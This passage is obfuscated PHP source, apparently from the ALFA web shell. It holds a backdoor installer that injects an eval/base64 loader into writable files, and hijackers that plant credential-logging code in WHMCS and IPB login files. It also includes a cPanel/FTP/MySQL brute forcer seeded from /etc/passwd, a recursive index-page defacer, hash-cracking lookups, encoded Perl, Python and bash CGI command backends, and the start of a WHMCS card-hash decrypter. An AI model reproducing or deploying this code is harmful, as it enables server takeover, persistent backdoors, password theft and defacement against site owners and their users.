str_replace(""", "\"", $dbuser) . "","" . str_replace(""", "\"", $dbpw) . "","" . str_replace(""", "\"", $dbname) . "");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>"; if (@is_file($file) && @is_writable($file)) { goto egCEU; egCEU: @mysqli_query($conn, "DROP TABLE `alfa_bc`"); goto T2Hof; E8fqO: @file_put_contents($file, $code . "
" . @file_get_contents($file)); goto Kfd20; Kfd20: __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . "</font>"); goto NLATw; T2Hof: @mysqli_query($conn, "CREATE TABLE `alfa_bc` (code LONGTEXT)"); goto YGW_a; YGW_a: @mysqli_query($conn, "INSERT INTO `alfa_bc` VALUES("" . $shell . "")"); goto E8fqO; NLATw: } else { __alert($error); } } goto Nf7SF; Nf7SF: } goto uE0w3; k5vXu: echo "<p><input type='submit' value=' '></p></form></p></center>"; goto Afit5; vYPta: echo "<p>{$select}</p>"; goto sWj8J; y7hBF: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Backdoor Loader: ", "inputName" => "file", "inputValue" => $cwd, "inputSize" => "50", "placeholder" => true), "td6" => array("color" => "FFFFFF", "tdName" => "Key: ", "inputName" => "key", "inputValue" => "alfa", "inputSize" => "50")); goto C2Glk; zOS1r: echo "<center><p><div class='txtfont_header'>| In DataBase |</div></p>" . getConfigHtml("all") . "<p><form onsubmit="g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;">"; goto y7hBF; sWj8J: echo $textarea; goto k5vXu; C2Glk: create_table($table); goto vYPta; uE0w3: } goto nKJB9; Metbw: echo "<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g('inbackdoor',null,'file')">| In File | </a><a href=javascript:void(0) onclick="g('inbackdoor',null,'db')">| In DataBase | </a></h3></center>"; goto fdDSf; nyPTZ: $success = "<font color="green">Success...!"; goto GKSGA; VeUJ2: if ($_POST["alfa1"] == "file") { echo "<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit="g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>"; if ($_POST["alfa2"] != '' && $_POST["alfa3"] != '' && $_POST["alfa4"] != '') { goto X7O02; qdjlk: if ($method == "my") { $shell = __ZW5jb2Rlcg($shell); } else { $shell = $GLOBALS["__ALFA_SHELL_CODE"]; } goto ZPg48; hzRfK: if ($key == '') { $key = "alfa"; } goto qdjlk; X7O02: $method = $_POST["alfa2"]; goto h3sXx; YyJxV: if (@is_file($file) && @is_writable($file)) { @file_put_contents($file, $code . "
" . @file_get_contents($file)); __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . "</font>"); } else { __alert($error); } goto NKLo5; I9NL0: $shell = $_POST["alfa4"]; goto g0HEO; ZPg48: $code = "<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="" . $key . ""){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("" . $shell . "");exit;}?>"; goto YyJxV; g0HEO: $key = str_replace(array(""", "'"), '', trim($_POST["alfa5"])); goto hzRfK; h3sXx: $file = $_POST["alfa3"]; goto I9NL0; NKLo5: } } goto n8BMP; YfG9w: alfahead(); goto Metbw; nKJB9: echo "</div>"; goto qPaf7; I16OI: } goto iV_HZ; C9S2d: function Alfa_ReadDir($dir, $method = '', $defpage = '') { if (!@is_readable($dir)) { return false; } if (@is_dir($dir)) { if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . "/" . $file; if (@is_readable($newfile) && @is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } if (@is_file($newfile)) { if (!@is_readable($newfile)) { continue; } Alfa_Rewriter($newfile, $file, $defpage, $method); } } closedir($dh); } } } goto bE8eZ; GQHkz: function AlfaiFrameCreator($f, $width = "100%", $height = "600px") { return "<iframe src="" . $f . "" width="" . $width . "" height="" . $height . "" frameborder="0"></iframe>"; } goto smFap; YZnih: function alfacpcrack() { goto mFi2E; mFi2E: alfahead(); goto r9f9L; MebSE: echo "</div>"; goto EkdHg; r9f9L: echo "<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g('cpcrack',null,'dec')">| DeCrypter | </a><a href=javascript:void(0) onclick="g('cpcrack',null,'analyzer')">| Hash Analyzer | </a></h3></center>"; goto SChlm; SChlm: if ($_POST["alfa1"] == "dec") { goto uwzZB; KyrDB: if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { goto m_aCO; VHMIk: echo "</center>"; goto pqxhk; b7P4y: $target = "http://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code; goto BEZgc; t0GJn: $code = "7b9fa79f92c3cd96"; goto b7P4y; c6Ho3: if (substr($resp, 0, 4) != "CODE" && $resp != '') { echo "<b>Result: <font color='green'>" . $resp . "</font></b>"; } elseif (substr($resp, 0, 4) != "CODE") { echo "<font color='red'>NoT Found</font><br />"; } goto VHMIk; m_aCO: $hash_type = $_POST["alfa4"]; goto KIaB5; BEZgc: $resp = @file_get_contents($target); goto Jcxio; Jcxio: if ($resp == '') { $get = new AlfaCURL(); $resp = $get->Send($target); } goto VdQRr; cmn6E: switch ($resp) { case "CODE ERREUR : 001": echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>"; break; case "CODE ERREUR : 003": echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>"; break; case "CODE ERREUR : 004": echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>"; break; case "CODE ERREUR : 005": echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>"; break; } goto c6Ho3; KIaB5: $email = "[email protected]"; goto t0GJn; VdQRr: echo __pre() . "<center>"; goto cmn6E; pqxhk: } } goto mqDzr; LoRa7: echo "<center><div class="txtfont_header">| DeCrypter |</div><br><br>
\xa<form onsubmit="g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">"; goto hh5z3; MIx_s: echo "</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; goto KyrDB; hh5z3: foreach ($algorithms as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } goto MIx_s; uwzZB: $algorithms = array("md5" => "MD5", "md4" => "MD4", "sha1" => "SHA1", "sha256" => "SHA256", "sha384" => "SHA384", "sha512" => "SHA512", "ntlm" => "NTLM"); goto LoRa7; mqDzr: } goto OVFmi; OVFmi: if ($_POST["alfa1"] == "analyzer") { echo "<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
\xa<form onsubmit="g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;">
\xa<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { goto HjUBo; fJrxF: if (preg_match("#<fieldset class="trouve">(.*?)</fieldset>#", $resp, $s)) { echo "<font color="green">" . $s[1] . "</font>"; } else { echo "<font color="red">Not Found...!</font>"; } goto OPPqH; OPPqH: echo "</center><br>"; goto S30Qc; HjUBo: $curl = new AlfaCURL(); goto j2hLd; j2hLd: $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search"); goto NnEks; NnEks: echo __pre() . "<center>"; goto fJrxF; S30Qc: } } } goto MebSE; EkdHg: alfafooter(); goto atrMd; atrMd: } goto FDVwi; P67H4: function alfaCrackers() { goto VfXar; XzBj2: $cracking = $_POST["alfa6"]; goto xmcW5; pjeDE: echo "</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
\xaPort: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>\xd\xa<textarea placeholder="Users" rows="20" cols="25" name="usernames">" . ($GLOBALS["sys"] == "unix" ? alfaEx("cut -d: -f1 /etc/passwd") : '') . "</textarea>\xd\xa&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>\xd\xaSave Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>"; goto qpCJ2; WqfON: echo "</select> Protocol: <select id="protocol" name="protocol">"; goto RmwCj; Zd2Ka: $fcrack = $_POST["alfa5"]; goto XzBj2; VfXar: alfahead(); goto M3JHO; HCe8A: $passwords = $_POST["alfa4"]; goto Zd2Ka; BIQ6l: $p = $loginpanel == "phpmyadmin" ? $p = true : false; goto cU0d6; dTFdH: echo "</div>"; goto IJ1Q8; M3JHO: AlfaNum(9, 10); goto Y3Os6; rBwoW: $loginpanel = $_POST["alfa8"]; goto BIQ6l; cU0d6: if ($cracking == "start") { goto fPAd9; jO5Uj: $expw = explode("
", $passwords); goto Cg2hV; whg6X: echo "<br><font color="red">Attack Finished...</font>"; goto Qw8Gm; r3YCs: $exuser = explode("\xa", $usernames); goto jO5Uj; fPAd9: echo __pre(); goto r3YCs; Cg2hV: foreach ($exuser as $user) { foreach ($expw as $pw) { $array = array("username" => trim($user), "password" => trim($pw), "port" => trim($port), "target" => trim($target), "protocol" => trim($protocol), "fcrack" => trim($fcrack), "mysql" => $p); Alfa_Call_Function_Cracker($loginpanel, $array); } } goto whg6X; Qw8Gm: } goto dTFdH; IJ1Q8: alfafooter(); goto j8LGs; sBi11: foreach (array("cp" => "Cpanel", "direct" => "DirectAdmin", "ftp" => "FTP", "phpmyadmin" => "PhpMyAdmin[DirectAdmin]", "mysql" => "mysql_connect()", "ftpc" => "ftp_connect()") as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } goto WqfON; GJ0gC: $port = $_POST["alfa2"]; goto fbdiQ; fbdiQ: $usernames = $_POST["alfa3"]; goto HCe8A; xmcW5: $protocol = $_POST["alfa7"]; goto rBwoW; RmwCj: foreach (array("https://", "http://", "ftp://") as $val) { echo "<option value="" . $val . "">" . $val . "</option>"; } goto pjeDE; qpCJ2: $target = str_replace(array("https://", "http://", "ftp://"), '', $_POST["alfa1"]); goto GJ0gC; Y3Os6: echo "<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g('Crackers',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,'start',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">"; goto sBi11; j8LGs: } goto oberm; fBhqD: @ini_set("error_log", NULL); goto S12M6; DFLIu: function hijackWhmcs($path, $saveto) { goto AZ4M2; AZ4M2: $code = "<?php if(isset($_POST['username']) AND isset($_POST['password']) AND !empty($_POST['username']) AND !empty($_POST['password'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST['username'];$alfa_pw = @$_POST['password'];if(isset($_POST['language'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = '$alfa_uname' AND `password` = '".md5($alfa_pw)."'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = '$alfa_uname'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(':', $row['password']);$__encPW = md5($__salt[1].$_POST['password']).':'.$__salt[1];if($row['password'] == $__encPW){$allow = true;$row['username'] = $row['email'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row['username'] . ' : ' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? 'is_admin' : 'is_user')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>"; goto dY00L; TQsaZ: $conf = $path . "/configuration.php"; goto XnJi7; dY00L: $code = str_replace("{saveto_path}", $saveto, $code); goto TQsaZ; XnJi7: if (@is_file($conf) and @is_writable($conf)) { goto CVmTS; hYsQS: if (!strstr($data_conf, "?>")) { $code = "?>" . $code; } goto pLvTo; ri16g: @file_put_contents($conf, $evil_conf); goto wKSKp; CVmTS: $data_conf = @file_get_contents($conf); goto hYsQS; pLvTo: $evil_conf = $data_conf . "
" . $code; goto ri16g; wKSKp: hijackOutput(0, $saveto); goto MOsjM; MOsjM: } else { hijackOutput(1); } goto AwVAh; AwVAh: } goto QZJSD; txlLW: if (!isset($_SESSION["alfa_settings_signature"])) { $check = true; } else { if ($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS["DB_NAME"], true))) { $check = true; } } goto pQKHQ; dsCAl: if (function_exists("set_magic_quotes_runtime")) { @set_magic_quotes_runtime(0); } goto ZHVU5; T6qB5: if ($config["AlfaProtectShell"]) { $SERVER_SIG = isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : ''; $Eform = "<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>"; } goto ZOZAR; QA5cV: function alfacmshijacker() { goto zjY0c; eGi88: $saveto = $_POST["alfa2"]; goto CngNP; AZFbS: foreach ($cm_array as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } goto BPzhK; pN7zP: AlfaNum(5, 6, 7, 8, 9, 10); goto oF3Ps; y_nJb: echo " Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
\xaSaveTo: <input size="50" type="text" name="saveto" value="" . $GLOBALS["cwd"] . "alfa.txt"></font>\xd\xa<input type="submit" name="btn" value=" "></form></center><br>"; goto iXQ17; zjY0c: alfahead(); goto pN7zP; LhRyN: echo "</div>"; goto b0qSf; iXQ17: $cms = $_POST["alfa1"]; goto eGi88; CngNP: $cmspath = $_POST["alfa4"]; goto vZQDO; mDqIX: $cm_array = array("vb" => "vBulletin", "wp" => "wordpress", "jom" => "joomla", "whmcs" => "whmcs", "mybb" => "mybb", "ipb" => "ipboard", "phpbb" => "phpbb"); goto AZFbS; b0qSf: alfafooter(); goto eahgT; BPzhK: echo "</select>"; goto y_nJb; oF3Ps: echo "<div class=header><br>\xd
<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g('cmshijacker',null,this.cmshi.value,this.saveto.value,'>>',this.cmspath.value);return false;" method='post'>
<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">"; goto mDqIX; vZQDO: if (!empty($cms) and !empty($saveto) and $_POST["alfa4"] and $_POST["alfa3"] == ">>") { echo __pre(); alfaHijackCms($cms, $cmspath, $saveto); } goto LhRyN; eahgT: } goto dF_Vy; DxDYU: function alfasearcher() { goto W111E; dIWHt: if ($_POST["alfa1"] == "str") { goto c_Wty; ajqGA: $string = $_POST["alfa3"]; goto Pg9nC; Ysb7J: if (!empty($string) and !empty($dir) and $_POST["alfa4"] == ">>") { echo __pre(); Alfa_StrSearcher($dir, $string, $ext, $_POST["alfa6"]); } goto WVgTc; GQ65n: $dir = $_POST["alfa2"]; goto ajqGA; Pg9nC: $ext = $_POST["alfa5"]; goto Ysb7J; c_Wty: echo "<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g('searcher',null,'str',this.dir.value,this.string.value,'>>',this.ext.value,this.method.value);return false;" method='post'>
<div class="txtfont">\xd\xaMethod: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>\xd\xaString: <input type="text" name="string" value="">
Dir: <input size="50" type="text" name="dir" value="" . $GLOBALS["cwd"] . "">\xd\xaExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
\xa<input type="submit" name="btn" value=" "></div></form></center><br>"; goto GQ65n; WVgTc: } goto nezS0; W111E: alfahead(); goto yT39R; nezS0: echo "</div>"; goto V1wUV; V1wUV: alfafooter(); goto p5ZWA; yT39R: echo "<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g('searcher',null,'file')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g('searcher',null,'str')">| Find Files By Name | </a></h3></center>"; goto TxDtW; TxDtW: if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "file") { goto NG5tg; NG5tg: echo "<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g('searcher',null,'file',this.filename.value,this.ext.value,this.method.value,'>>');return false;" method='post'>\xd
<div class="txtfont">\xd\xaMethod: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
\xaDir: <input size="50" id="target" type="text" name="filename" value="" . $GLOBALS["cwd"] . "">\xd\xaExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
<input type="submit" name="btn" value=" "></div></form></center><br>"; goto EZzDh; P1WBp: if ($_POST["alfa5"] == ">>") { goto lptYD; lptYD: echo __pre(); goto RoA_T; kkZaU: Alfa_Searcher($dir, trim($ext), $method); goto hgre2; RoA_T: if (substr($dir, -1) == "/") { $dir = substr($dir, 0, -1); } goto kkZaU; hgre2: } goto GBMmg; EZzDh: $dir = $_POST["alfa2"]; goto P3Vpo; q3M5m: $method = $_POST["alfa4"]; goto P1WBp; P3Vpo: $ext = $_POST["alfa3"]; goto q3M5m; GBMmg: } goto dIWHt; p5ZWA: } goto GMkUM; JD3G8: function _alfa_cgicmd($cmd, $lang = "perl") { goto JTw7t; JTw7t: if (isset($_SESSION["alfacgiapi_mode"])) { return ''; } goto Tw3rU; Tw3rU: $cmd_pure = $cmd; goto etYDO; etYDO: $is_curl = function_exists("curl_version"); goto xTL8f; BRfxQ: if ($is_curl || $is_socket) { goto klSLv; HqzWE: if ($is_curl) { goto jDG_P; cxBz8: $data = $post->Send($address, "post", $cmd); goto Gsxy0; nGV9g: $post = new AlfaCURL(); goto cxBz8; jDG_P: $address = ($_SERVER["SERVER_PORT"] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa"; goto nGV9g; Gsxy0: } elseif ($is_socket) { goto SwDUL; SwDUL: $server = $_SERVER["SERVER_NAME"]; goto j2LeF; j2LeF: $uri = dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa"; goto H7rgc; H7rgc: $data = _alfa_fsockopen($server, $uri, $cmd); goto Rpjtj; Rpjtj: } goto NNvve; M2Pv9: if (isset($_SESSION["alfacgiapi"])) { if (!@file_exists("alfacgiapi/" . $_SESSION["alfacgiapi"] . ".alfa")) { $recreate = true; $lang = $_SESSION["alfacgiapi"]; } } goto BBQHD; IjTHJ: if (strstr($data, "[solevisible~api]")) { $_SESSION["alfacgiapi"] = $lang; if (@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)) { $out = $res[1]; } } elseif ($lang == "perl") { return _alfa_cgicmd($cmd_pure, "py"); } elseif ($lang == "py") { return _alfa_cgicmd($cmd_pure, "bash"); } else { $_SESSION["alfacgiapi_mode"] = "off"; } goto q1zsv; NNvve: $out = ''; goto IjTHJ; q1zsv: return trim($out); goto anbPW; klSLv: $recreate = false; goto M2Pv9; G1Nc1: $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS["cwd"] . ";" . $cmd); goto HqzWE; BBQHD: if (!isset($_SESSION["alfacgiapi"]) || $recreate) { goto wwksu; b5t6o: $perl = "jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM="; goto tj3qP; tj3qP: $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI="; goto zBWMQ; UnxIn: alfacgihtaccess("cgi", "alfacgiapi/"); goto GSGke; rVk41: alfaWriteTocgiapi($lang . ".alfa", $source); goto UnxIn; VyjZv: if ($lang == "perl") { $source = $perl; } elseif ($lang == "py") { $source = $py; } else { $source = $bash; } goto rVk41; wwksu: @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); goto b5t6o; zBWMQ: $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C"; goto VyjZv; GSGke: } else { $lang = $_SESSION["alfacgiapi"]; } goto G1Nc1; anbPW: } else { return ''; } goto vt0Af; xTL8f: $is_socket = function_exists("fsockopen"); goto BRfxQ; vt0Af: } goto MX59A; NIscI: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto wKMv3; bE8eZ: function Alfa_Rewriter($dir, $file, $defpage, $m = "index") { goto SwWRT; zTnOP: if ($m == "index") { $indexs = array("index.php", "index.htm", "index.html", "default.asp", "default.aspx", "index.asp", "index.aspx", "index.js"); if (in_array(strtolower($file), $indexs)) { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir . "<b><font color='red'>DeFaced...</b></font><br>" : ''; } } elseif ($m == "all") { @file_put_contents($dir, $defpage); echo @is_file($dir) ? $dir . "  <b><font color='red'>DeFaced...</b></font><br>" : ''; } goto jYeCt; SwWRT: if (!@is_writable($dir)) { return false; } goto ZBbvC; ZBbvC: if (!@is_readable($dir)) { return false; } goto jCXum; jCXum: $defpage = @file_get_contents($defpage); goto zTnOP; jYeCt: } goto tNC7F; a111_: function hijackIPB($path, $saveto) { goto etNxe; czjsH: $evil_login = "\x9" . $find . "\xa	" . $code; goto ocfhD; j2bOy: $login = $path . "/admin/sources/handlers/han_login.php"; goto czjsH; etNxe: $code = "$Alfa_q = $this->DB->buildAndFetch(array('select' => 'email', 'from' => 'members', 'where' => 'name="'.$username.'" OR email="'.$email.'"'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST['ips_username'].' : '.$_POST['ips_password'].' ( '.$Alfa_q['email'].' )'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);"; goto NDWb7; ocfhD: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $find)) { goto lumCU; KIkDn: @file_put_contents($login, $login_replace); goto kAjPT; kAjPT: hijackOutput(0, $saveto); goto XQqDT; lumCU: $login_replace = str_replace($find, $evil_login, $data_login); goto KIkDn; XQqDT: } else { hijackOutput(1); } } else { hijackOutput(1); } goto YAbZC; Mx05h: $code = str_replace("{saveto_path}", $saveto, $code); goto j2bOy; NDWb7: $find = "unset( $member['plainPassword'] );"; goto Mx05h; YAbZC: } goto kOVkY; aymIz: if (isset($_POST["ajax"])) { function AlfaNum() { goto WSQot; Tsh7V: $alfax = array(); goto Mi9dE; Mi9dE: $find = array(); goto vnsCG; Kj516: echo """</script>"; goto RXVEY; usJKh: foreach ($alfax as $alfa) { if (in_array($alfa, $find)) { continue; } echo "alfa" . $alfa . "_="; } goto Kj516; tWYri: foreach ($args as $arg) { $find[] = $arg; } goto eRJXW; WSQot: $args = func_get_args(); goto Tsh7V; eRJXW: echo "<script>"; goto usJKh; vnsCG: for ($i = 1; $i <= 10; $i++) { $alfax[] = $i; } goto tWYri; RXVEY: } } goto JD3G8; ediR0: function alfaWhmcs() { goto IE_h6; g_2lk: function _hash($string) { goto d2Qy7; DQv2B: while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } goto swFVd; swFVd: return $out; goto Q8XXk; d2Qy7: if (function_exists("sha1")) { $hash = sha1($string); } else { $hash = md5($string); } goto bnTro; Iy_kK: $c = 0; goto DQv2B; bnTro: $out = ''; goto Iy_kK; Q8XXk: } goto IP89F; O5g9w: echo "<div class=header>"; goto KHVXc; NCkjH: create_table($table); goto rvPk6; Fy425: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "db_host : ", "inputName" => "db_host", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "db_username : ", "inputName" => "db_username", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "db_password : ", "inputName" => "db_password", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "db_name : ", "inputName" => "db_name", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "cc_encryption_hash : ", "inputName" => "cc_encryption_hash", "id" => "cc_encryption_hash", "inputValue" => '', "inputSize" => "50")); goto NCkjH; KHVXc: function decrypt($string, $cc_encryption_hash) { goto LfAMy; xSzRj: $key = $iv; goto FfUQ8; FfUQ8: $c = 0; goto chddk; chddk: while ($c < strlen($string)) { if ($c != 0 and $c % $hash_length == 0) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } goto arN_l; xF9cN: $hash_length = strlen($hash_key); goto cb37j; cb37j: $string = __ZGVjb2Rlcg($string); goto PhvvT; XGHl_: $c = 0; goto JYlBy; LfAMy: $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); goto AsAnA; JYlBy: while 